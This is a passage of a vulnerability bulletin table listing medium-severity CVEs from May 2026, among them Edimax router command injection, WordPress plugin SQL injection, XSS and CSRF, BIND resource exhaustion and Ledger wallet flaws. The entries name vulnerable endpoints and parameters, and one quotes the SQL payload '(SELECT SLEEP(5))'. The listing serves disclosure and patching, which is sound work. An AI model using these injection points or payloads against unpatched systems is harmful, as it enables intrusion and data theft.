| Edimax--EW-7438RPn | A vulnerability was identified in Edimax EW-7438RPn 1.28a. Affected by this vulnerability is the function formHwSet of the file /goform/formHwSet of the component POST Request Handler. The manipulation of the argument Anntena/Mcs/regDomain/nic0Addr/nic1Addr/wlanAddr/wanAddr/wlanSSID/wlanChan/comd/initgain/txcck/txofdm leads to command injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9359 | VDB-365322 | Edimax EW-7438RPn POST Request formHwSet command injection VDB-365322 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811540 | EDIMAX EW-7438RPn Mini EW-7438RPn Mini Firmware 1.28a (Version : 1.28a) Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-EW-7438RPn-Mini-formHwSet-34b53a41781f80b98d10f0da699f2236?source=copy_link |
| Edimax--EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn 1.12. This affects the function formAccept of the file /goform/formAccep of the component POST Request Handler. This manipulation of the argument submit-url causes command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9361 | VDB-365324 | Edimax EW-7438RPn POST Request formAccep formAccept command injection VDB-365324 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811552 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formAccept-34b53a41781f807fb8f3d96c5e5ef215?source=copy_link |
| Edimax--EW-7438RPn | A security vulnerability has been detected in Edimax EW-7438RPn 1.12. This vulnerability affects the function formConnectionSetting of the file /goform/formConnectionSetting of the component Setting Handler. Such manipulation of the argument max_Conn/timeOut leads to command injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9362 | VDB-365325 | Edimax EW-7438RPn Setting formConnectionSetting command injection VDB-365325 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811553 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formConnectionSetting-34b53a41781f807a9c88e746d24540cd?source=copy_link |
| Edimax--EW-7438RPn | A vulnerability was detected in Edimax EW-7438RPn 1.12. This issue affects the function formEZCHNwlanSetup of the file /goform/formEZCHNwlanSetu of the component POST Request Handler. Performing a manipulation of the argument method results in command injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-24 | 6.3 | CVE-2026-9363 | VDB-365326 | Edimax EW-7438RPn POST Request formEZCHNwlanSetu formEZCHNwlanSetup command injection VDB-365326 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811554 | EDIMAX BR-6675nD BR-6675nD v1.12 Command Injection https://lavender-bicycle-a5a.notion.site/EDIMAX-BR-6675nD-formEZCHNwlanSetup-34b53a41781f803a8c60ca409394df5b?source=copy_link |
| edmonparker--Read More & Accordion | The Read More & Accordion plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 3.5.7. This is due to the use of esc_sql() without surrounding the value in quotes in an ORDER BY clause inside the getAllDataByLimit() and getAccordionAllDataByLimit() functions in ReadMoreData.php. The user-supplied $_GET['orderby'] value is only processed through esc_attr() (an HTML-escaping function) before being passed to these database functions, where esc_sql() is applied but the value is directly concatenated-unquoted-into the ORDER BY fragment of the SQL query before $wpdb->prepare() is called. Because esc_sql() only escapes quote characters and backslashes (which are irrelevant in an unquoted ORDER BY context), an attacker can inject arbitrary SQL expressions such as (SELECT SLEEP(5)) or conditional subqueries to perform time-based blind data extraction. This makes it possible for authenticated attackers with administrator-level access or above (or any role explicitly permitted access to the plugin's admin pages via the yrm-user-roles setting) to extract sensitive data from the database, including administrator credential hashes. | 2026-05-20 | 4.9 | CVE-2026-7472 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cc7c7e21-fbd7-4451-bc7d-3d11db01a443?source=cve https://plugins.trac.wordpress.org/browser/expand-maker/trunk/classes/ReadMoreData.php#L1522 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/classes/ReadMoreData.php#L1522 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/views/readMorePagesView.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/views/readMorePagesView.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/classes/ReadMoreData.php#L1537 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/classes/ReadMoreData.php#L1537 https://plugins.trac.wordpress.org/browser/expand-maker/trunk/views/accordionBuilder/list.php#L29 https://plugins.trac.wordpress.org/browser/expand-maker/tags/3.5.7/views/accordionBuilder/list.php#L29 |
| espocrm--espocrm | EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below allow authenticated users to upload SVG attachments through normal attachment-capable fields and later serve those SVG files as top-level inline documents through both the attachment and image entry points, resulting in stored cross-user XSS reachable through a normal attachment workflow. Although inline SVG script is blocked by the response CSP, the same CSP still allows same-origin external script. As a result, an attacker can upload a malicious SVG together with a second attacker-controlled JavaScript attachment, then trick another user into opening the SVG to execute JavaScript in the victim's EspoCRM origin. This issue has been fixed in version 9.3.4. | 2026-05-19 | 6.8 | CVE-2026-33741 | https://github.com/espocrm/espocrm/security/advisories/GHSA-5wh5-ccv2-m3pv |
| Esri--ArcGIS Server | ArcGIS Server contains an improper authentication vulnerability in an undocumented administrative endpoint. An unauthenticated attacker could exploit this issue by sending a crafted request to the endpoint. Successful exploitation may result in disruption of the web-based browsing interface. This issue affects ArcGIS Server 12.0 and earlier. | 2026-05-20 | 5.3 | CVE-2026-2812 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin |
| Esri--ArcGIS Server | ArcGIS Server contains an input validation weakness in the login redirection workflow. An Authenticated attacker could exploit this issue by sending a specially crafted request, Successful exploitation may result in the application redirecting the browser to an unintended, untrusted site, resulting in a limited confidentiality impact under specific user interaction conditions. The vulnerability affects only the client side navigation logic during authentication and remains confined to the same security boundary. No server side compromise or cross component impact is possible. This issue affects ArcGIS Server 11.5. | 2026-05-20 | 4.7 | CVE-2026-2813 | https://www.esri.com/arcgis-blog/products/trust-arcgis/administration/april2026_security_bulletin |
| etspring--LJ comments import: reloaded | The LJ comments import: reloaded plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.97.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The vulnerability arises specifically because PHP_SELF includes attacker-controllable PATH_INFO appended to the script name, and there are two distinct unsanitized echo points for this value in the same function. | 2026-05-20 | 6.1 | CVE-2026-8624 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0f09cb59-dbbb-48a3-aeac-377f6ec87b88?source=cve https://plugins.trac.wordpress.org/browser/lj-comments-import-reloaded/trunk/lj_comments_import.php#L129 https://plugins.trac.wordpress.org/browser/lj-comments-import-reloaded/trunk/lj_comments_import.php#L161 |
| goback2--Logo Manager For Enamad | The Logo Manager For Enamad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the `vc_enamad_namad`, `vc_enamad_shamed`, and `vc_enamad_custom` shortcodes in all versions up to, and including, 0.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-20 | 6.4 | CVE-2026-6549 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ed6d1167-c89d-4c97-9446-b968df945e6c?source=cve https://wordpress.org/plugins/logo-manager-for-enamad https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/tags/0.7.4/widgets.php#L295 https://plugins.trac.wordpress.org/browser/logo-manager-for-enamad/trunk/widgets.php#L295 |
| HCL--BigFix Service Management (SM) | HCL BigFix Service Management (SM) is susceptible to a Configuration - 'Insecure Use of Base Image Version'. Using outdated or insecure base images may introduce known vulnerabilities, potentially increasing the risk of exploitation in the application environment. | 2026-05-20 | 4 | CVE-2025-31973 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128144 |
| HCLSoftware--Connections | HCL Connections contains a broken access control vulnerability that may allow unauthorized user to update data in certain scenarios. | 2026-05-18 | 4.6 | CVE-2026-21789 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129719 |
| HCLSoftware--DominoIQ | The HCL DominoIQ RAG feature is affected by a Broken Access Control vulnerability. Under certain circumstances, document level access restrictions will be ignored when determining what data to return from an AI query. This could enable an authenticated attacker to view sensitive data. | 2026-05-20 | 6.5 | CVE-2026-21836 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0130932 |
| heartcombo--devise | Devise is an authentication solution for Rails based on Warden. In versions 5.0.3 and below, when the Timeoutable module is enabled in Devise, the FailureApp#redirect_url method returns request.referrer - the HTTP Referer header, which is attacker-controllable - without validation for any non-GET request that results in a session timeout. An attacker who hosts a page with an auto-submitting cross-origin form can cause a victim with an expired Devise session to be redirected to an arbitrary external URL. This contrasts with the GET timeout path (which uses server-side attempted_path) and Devise's own store_location_for mechanism (which strips external hosts via extract_path_from_location), both of which are protected; only the non-GET timeout redirect path is unprotected. Expired-session users can be silently redirected from the trusted app domain to attacker-controlled URLs, enabling phishing and malware delivery while bypassing browser warnings. Note: Rails' built-in open-redirect protection does not mitigate this issue. Devise::FailureApp is an ActionController::Metal app with its own isolated copy of the relevant redirect configuration, so config.action_controller.action_on_open_redirect = :raise (and the older raise_on_open_redirects setting) do not reach it. This issue has been fixed in version 5.0.4. | 2026-05-22 | 6.1 | CVE-2026-40295 | https://github.com/heartcombo/devise/security/advisories/GHSA-jp94-3292-c3xv https://github.com/heartcombo/devise/commit/025fe2124f9928766fc46520e999633b598d0360 |
| helgatheviking--KIA Subtitle | The KIA Subtitle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's `the-subtitle` shortcode `before` and `after` attributes in all versions up to, and including, 4.0.1. This is due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-22 | 6.4 | CVE-2026-7509 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a9a52097-0d85-4036-9b74-f35fea549607?source=cve https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.1/kia-subtitle.php#L359 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.1/kia-subtitle.php#L329 https://plugins.trac.wordpress.org/browser/kia-subtitle/trunk/kia-subtitle.php#L359 https://plugins.trac.wordpress.org/browser/kia-subtitle/trunk/kia-subtitle.php#L329 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.2/kia-subtitle.php#L369 https://plugins.trac.wordpress.org/browser/kia-subtitle/tags/4.0.2/kia-subtitle.php#L370 |
| helpstring--Child Height Predictor by Ostheimer | The Child Height Predictor by Ostheimer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 1.3. This is due to missing nonce verification in the options() function, which handles plugin settings updates. The form template does not include a wp_nonce_field() call, and the handler never calls check_admin_referer() or wp_verify_nonce(). This makes it possible for unauthenticated attackers to trick a site administrator into clicking a link or visiting a malicious page that submits a forged POST request, causing unauthorized changes to the plugin settings such as unit preferences to be persisted to the database via update_option(). | 2026-05-20 | 4.3 | CVE-2026-6400 | https://www.wordfence.com/threat-intel/vulnerabilities/id/dc1681a8-5f2e-45f1-96d9-797b13644607?source=cve https://plugins.trac.wordpress.org/browser/child-height-predictor/trunk/childheight.php#L149 https://plugins.trac.wordpress.org/browser/child-height-predictor/tags/1.3/childheight.php#L149 https://plugins.trac.wordpress.org/browser/child-height-predictor/trunk/childheight.php#L135 https://plugins.trac.wordpress.org/browser/child-height-predictor/tags/1.3/childheight.php#L135 |
| Honeywell International Inc.--Control Network Module (CNM) | Honeywell Control Network Module (CNM) contains insertion of sensitive information into an unintended directory. An attacker could exploit this vulnerability through probing system files, potentially resulting in unintended access to protected data. | 2026-05-21 | 5.9 | CVE-2026-5434 | https://process.honeywell.com/ |
| infility--Infility Global | The Infility Global plugin for WordPress is vulnerable to SQL Injection via the 'orderby' and 'order' parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the 'read' capability. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-20 | 6.5 | CVE-2026-8685 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=cve https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L34 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L74 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L78 https://plugins.trac.wordpress.org/browser/infility-global/trunk/widgets/show-control-data/show-control-data.php#L84 |
| Intelbras -- VIP-1230-D-G4 | An issue in Intelbras VIP-1230-D-G4 Version V2.800.00IB00C.0.T allows a remote attacker to obtain sensitive information via password reset functionality under /OutsideCmd | 2026-05-18 | 5.3 | CVE-2026-36438 | https://backend.intelbras.com/sites/default/files/2023-03/Datasheet%20UNIFICADO%20-%20VIP%201230%20B.D.G4-v2.pdf https://www.intelbras.com/pt-br/camera-dome-wi-fi-vip-1230-d-w-g4 https://github.com/kensh1k/CVE-2026-36438/tree/main |
| ISC--BIND 9 | BIND resolvers are vulnerable to an amplified resource consumption/exhaustion attack. If a victim resolver makes a query to a specially crafted zone, the resolver will consume disproportionate resources. This issue affects BIND 9 versions 9.11.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.11.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 5.3 | CVE-2026-3592 | CVE-2026-3592 https://downloads.isc.org/isc/bind9/9.18.49 https://downloads.isc.org/isc/bind9/9.20.23 https://downloads.isc.org/isc/bind9/9.21.22 |
| ISC--BIND 9 | An unbounded resend loop vulnerability exists in the BIND 9 resolver state machine during bad-server handling, enabling a remote unauthenticated attacker to cause severe resource exhaustion by sending queries that trigger specific retry conditions. This issue affects BIND 9 versions 9.18.36 through 9.18.48, 9.20.8 through 9.20.22, 9.21.7 through 9.21.21, 9.18.36-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1. | 2026-05-20 | 5.3 | CVE-2026-5950 | CVE-2026-5950 https://downloads.isc.org/isc/bind9/9.18.49 https://downloads.isc.org/isc/bind9/9.20.23 https://downloads.isc.org/isc/bind9/9.21.22 |
| ItzCrazyKns--Vane | A security vulnerability has been detected in ItzCrazyKns Vane up to 1.12.1. Affected by this issue is some unknown functionality of the file route.ts of the component API. The manipulation leads to missing authentication. The attack may be initiated remotely. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been disclosed publicly and may be used. It appears that basic authentication is planned. | 2026-05-24 | 5.6 | CVE-2026-9371 | VDB-365334 | ItzCrazyKns Vane API route.ts missing authentication VDB-365334 | CTI Indicators (IOB, IOC, IOA) Submit #813209 | ItzCrazyKns Vane 1.12.1 API Key Exposure Submit #813210 | ItzCrazyKns Vane 1.12.1 Missing Authentication for Critical Function (Duplicate) https://github.com/ItzCrazyKns/Vane/issues/1122 https://github.com/ItzCrazyKns/Vane/issues/1123 https://github.com/ItzCrazyKns/Vane/ |
| jarrodwatts--claude-hud | Claude HUD through 0.0.12, patched in commit 234d9aa, constructs OSC 8 terminal hyperlink escape sequences using raw cwd and branchUrl values without stripping control characters or encoding embedded values, allowing attackers to inject arbitrary ANSI codes into terminal sessions. Attackers can embed ESC+backslash sequences in the current working directory or branch URL to execute malicious ANSI codes including text color changes, forged prompts, and OSC 52 clipboard writes, or trigger outbound HTTP requests to attacker-controlled remotes when hyperlinks are clicked. | 2026-05-18 | 4.6 | CVE-2026-47090 | https://github.com/jarrodwatts/claude-hud/issues/485 https://github.com/jarrodwatts/claude-hud/pull/487 https://github.com/jarrodwatts/claude-hud/commit/234d9aad919b51326a43bcf90b45ae35c23afc30 https://www.vulncheck.com/advisories/claude-hud-terminal-injection-via-osc-8-hyperlinks |
| javibola--JaviBola Custom Theme Test | The JaviBola Custom Theme Test plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.5. This is due to missing or incorrect nonce validation on the options page. This makes it possible for unauthenticated attackers to change the site's active theme by modifying the jbct_theme option via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8423 | https://www.wordfence.com/threat-intel/vulnerabilities/id/68a8a277-2ea6-4d75-b8cd-4d20eb17b3aa?source=cve https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L41 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L41 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L40 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L40 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/trunk/javibola-custom-theme.php#L54 https://plugins.trac.wordpress.org/browser/javibola-custom-theme/tags/2.0.5/javibola-custom-theme.php#L54 |
| jay_patel--Remove Yellow BGBOX | The Remove Yellow BGBOX plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing or incorrect nonce validation on the 'rybb_api_settings' page. This makes it possible for unauthenticated attackers to reset the plugin's stored settings by overwriting its configuration via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-8424 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5b30d27-a3f8-4535-a47f-675c939ec648?source=cve https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/trunk/admin/rybb_api_settings.php#L5 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/tags/1.0/admin/rybb_api_settings.php#L5 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/trunk/includes/functions.php#L16 https://plugins.trac.wordpress.org/browser/remove-yellow-bgbox/tags/1.0/includes/functions.php#L16 |
| jetmonsters--MotoPress Hotel Booking | The MotoPress Hotel Booking plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 6.0.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to overwrite or delete the internal notes (_mphb_booking_internal_notes) of any booking by supplying an arbitrary booking ID. The nonce for this action is output in the HTML source of every public page through wp_localize_script (MPHB._data.nonces), so any unauthenticated visitor can obtain a valid nonce and perform the action without any account or prior interaction. | 2026-05-22 | 5.3 | CVE-2026-8684 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6567e63c-3129-47b2-a734-733eb599821a?source=cve https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-actions/update-booking-notes.php#L83 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-actions/abstract-ajax-api-action.php#L34 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/6.0.1/includes/ajax-api/ajax-api-handler.php#L43 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-actions/update-booking-notes.php#L83 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-actions/abstract-ajax-api-action.php#L34 https://plugins.trac.wordpress.org/browser/motopress-hotel-booking-lite/tags/5.4.1/includes/ajax-api/ajax-api-handler.php#L43 https://plugins.trac.wordpress.org/changeset/3537354/motopress-hotel-booking-lite/trunk/includes/ajax-api/ajax-actions/update-booking-notes.php |
| Jomres--Jomres | Joomla Component jomres 9.11.2 contains a cross-site request forgery vulnerability that allows attackers to modify user account information by tricking authenticated users into visiting malicious pages. Attackers can craft HTML forms targeting the account/index endpoint with hidden fields to change passwords, email addresses, and profile details without user consent. | 2026-05-23 | 4.3 | CVE-2018-25354 | ExploitDB-44901 Official Product Homepage Product Reference VulnCheck Advisory: Joomla Component jomres 9.11.2 Cross-Site Request Forgery |
| jupyterhub--jupyterhub | JupyterHub is software that allows users to create a multi-user server for Jupyter notebooks. In versions 4.1.0 through 5.4.4, XSRF protection (updated in 4.1.0) inappropriately treated requests with Sec-Fetch-Mode: no-cors as same-origin requests, bypassing XSRF checks. The JSON API is not affected, only HTTP form endpoints, such as /hub/spawn and /hub/accept-share, meaning attackers could trigger server spawn (but not access the server) and if the attacker is a JupyterHub user permitted to share access to their server, cause a user to accept a share and have access to the attacker's server. This issue has been fixed in version 5.4.5. If developers are unable to immediately upgrade, they can temporarily mitigate this issue by dropping requests to JupyterHub with Sec-Fetch-Mode: no-cors if they are using a reverse proxy. | 2026-05-22 | 5.4 | CVE-2026-40864 | https://github.com/jupyterhub/jupyterhub/security/advisories/GHSA-m68r-v472-jgq9 https://github.com/jupyterhub/jupyterhub/commit/9c5ec277d3cda5a59de2d8c8117efa77bd941127 |
| kasparsd--Widget Context | The Widget Context plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.3. This is due to missing or incorrect nonce validation on the save_widget_context_settings function. This makes it possible for unauthenticated attackers to modify widget visibility context settings stored in the WordPress options table via a forged POST request to /wp-admin/widgets.php via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-22 | 4.3 | CVE-2026-7615 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3c434637-4bf9-46ee-9a6d-35eab7ef11a1?source=cve https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L311 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L311 https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L282 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L282 https://plugins.trac.wordpress.org/browser/widget-context/trunk/src/WidgetContext.php#L91 https://plugins.trac.wordpress.org/browser/widget-context/tags/1.3.3/src/WidgetContext.php#L91 https://github.com/kasparsd/widget-context-wporg/pull/73 |
| Kieback & Peter--DDC4002 | The affected Kieback & Peter DDC building controllers are vulnerable to cross-site scripting, enabling JavaScript to be executed by the victim's browser, which allows the attacker to control the browser. | 2026-05-20 | 5.3 | CVE-2026-4293 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-139-05 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-139-05.json |
| ktulhu--Bigfishgames Syndicate | The Bigfishgames Syndicate plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the bigfishgames_syndicate_submenu() function. This makes it possible for unauthenticated attackers to reset plugin settings and update them via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 4.3 | CVE-2026-6452 | https://www.wordfence.com/threat-intel/vulnerabilities/id/67877a2e-a45d-4674-b749-05d9217ef6bf?source=cve https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/trunk/bigfishgames-syndicate.php#L238 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/tags/1.2/bigfishgames-syndicate.php#L238 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/trunk/bigfishgames-syndicate.php#L169 https://plugins.trac.wordpress.org/browser/bigfishgames-syndicate/tags/1.2/bigfishgames-syndicate.php#L169 |
| langgenius--dify | Dify version 1.14.1 and prior contain an authorization bypass vulnerability in the file preview endpoint that allows any authenticated user to read up to 3,000 characters of any uploaded document across all tenants and workspaces using only the file's UUID. Attackers can access the /console/api/files/{file_id}/preview endpoint with an intercepted file UUID to extract sensitive content from documents without ownership or workspace permission verification. NOTE: Dify Cloud allows unauthenticated free self-registration, making account creation trivially accessible to any attacker. | 2026-05-18 | 5.9 | CVE-2026-41949 | https://huntr.com/bounties/d50a0240-7951-4939-b989-9bded66c7682 https://github.com/langgenius/dify/pull/35797 https://www.vulncheck.com/advisories/dify-authorization-bypass-via-file-preview-endpoint |
| laurent22--joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.6.14 and prior contain a Denial of Service (DoS) vulnerability in the title input functionality due to a lack of proper length validation. This flaw allows an attacker to cause an Out Of Memory (OOM) error and subsequent program termination by inserting an excessively long string into a note's title. This can be triggered either through direct user interface (UI) input or programmatically via the local web service API after compromising an authentication token. There are 2 primary methods of exploitation: via User Interface (UI) Input, and the Local Web Service API. A local user can directly type or paste an extremely long string into the title field when creating or editing a note Joplin runs a local web service (typically on port 41184) that allows programmatic interaction, such as creating or editing notes via HTTP API calls. If an attacker manages to exfiltrate or compromise the user's authentication token (e.g., through malware on the local system, or other local vulnerabilities), they can then send a crafted HTTP POST request to this local API. By including an excessively long string in the title parameter of this request, the application will attempt to allocate an unbounded amount of memory. This issue has been patched in version 3.7.1. | 2026-05-19 | 5.5 | CVE-2025-57798 | https://github.com/laurent22/joplin/security/advisories/GHSA-6jm8-gr87-q69x https://github.com/laurent22/joplin/commit/5b8795da446a5a40c9e212c98b35e368ffce628e |
| laurent22--joplin | Joplin is an open source note-taking and to-do application that organises notes and lists into notebooks. Versions 3.5.2 and prior contain a logic error in the delta API that allows share recipients to download notes that are no longer shared with them, related to but not fully fixed by the prior patch in #14289. In ChangeModel.delta, when DELTA_INCLUDES_ITEMS is enabled (the default), the latest state of items is attached to delta output without verifying that those items are still shared with the requesting user, and the existing removal logic only filters items deleted for all users. Additionally, the change compression logic incorrectly reduces create - delete to NOOP, which is unsafe because compression is applied per page and an item can have multiple create events; if an earlier create falls on a separate page from a later create -> delete pair, the deletion is dropped and the sequence collapses to a create. As a result, the delta API returns a create event for a deleted item with the full latest content attached, exposing notes the user no longer has access to. This issue has been fixed in version 3.5.3. | 2026-05-19 | 5.7 | CVE-2026-34600 | https://github.com/laurent22/joplin/security/advisories/GHSA-88x4-77rc-jw94 https://github.com/laurent22/joplin/issues/14110 https://github.com/laurent22/joplin/pull/14289 |
| Ledger--Ledger Bitcoin app | Ledger Bitcoin app versions 2.1.0 and 2.1.1 contain an address derivation vulnerability that allows attackers to cause incorrect Bitcoin addresses to be displayed by exploiting improper handling of miniscript policies containing the a: fragment. Attackers can craft malicious miniscript policies that cause the device to derive and display incorrect receiving addresses, potentially leading to funds being sent to unintended addresses. | 2026-05-20 | 4 | CVE-2023-7346 | Ledger Security Bulletin 019 https://www.vulncheck.com/advisories/ledger-bitcoin-app-address-derivation-error-via-miniscript |
| Ledger--Ledger Nano X | Ledger Nano X, Flex, and Stax devices contain a denial of service vulnerability in the MCU firmware update process due to missing validation of the reset_handler parameter during firmware flashing. An attacker can provide a crafted reset_handler address pointing to invalid memory or attacker-controlled code to cause the device to enter an unrecoverable fault state during boot, resulting in permanent loss of operability. | 2026-05-19 | 4.6 | CVE-2025-15645 | Ledger Security Bulletin 021 https://www.vulncheck.com/advisories/ledger-nano-x-flex-stax-mcu-firmware-update-denial-of-service |
| Ledger--ledgerhq/hw-app-eth | Ledger Live with vulnerable versions of ledgerhq/hw-app-eth prior to 6.34.7 contains an integer parsing vulnerability that allows attackers to manipulate EIP-712 typed data messages by exploiting incorrect hexadecimal field parsing when values contain an odd number of characters. Attackers can obtain signatures on truncated or misinterpreted message values to authorize unintended blockchain transactions, such as asset transfers at incorrect amounts. | 2026-05-19 | 6.5 | CVE-2023-7345 | Ledger Security Bulletin 020 https://www.vulncheck.com/advisories/ledger-live-hw-app-eth-eip-712-message-parsing-integer-truncation |
| linlinjava--litemall | A security vulnerability has been detected in linlinjava litemall up to 1.8.0. Affected by this vulnerability is the function backup/load of the file litemall-db/src/main/java/org/linlinjava/litemall/db/util/DbUtil.java of the component Database Setting Handler. The manipulation of the argument db/password leads to argument injection. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-18 | 4.7 | CVE-2026-8773 | VDB-364398 | linlinjava litemall Database Setting DbUtil.java load argument injection VDB-364398 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #811469 | linlinjava litemall up to 1.8.0 Argument Injection https://gist.github.com/A1AAAAAAAAAA1/d5ae30a17744459e7cc5902fff32a35b |
| Live Networks, Inc.--LIVE555 | LIVE555 before 2026.04.22 contains an authorization bypass vulnerability in RTSP session command handling that allows attackers to replay valid Session tokens from unauthenticated connections. Attackers who obtain a valid Session token can issue PLAY and TEARDOWN commands from a second TCP connection without authentication, causing server crashes through virtual function call errors or disrupting active streams by terminating victim sessions. | 2026-05-19 | 5.9 | CVE-2026-41470 | https://gist.github.com/yhcho0405/ee9b67a96808ef19f22e8a4ee88c795f https://download.live555.com/ https://www.vulncheck.com/advisories/live555-rtsp-server-authorization-bypass-via-session-token |
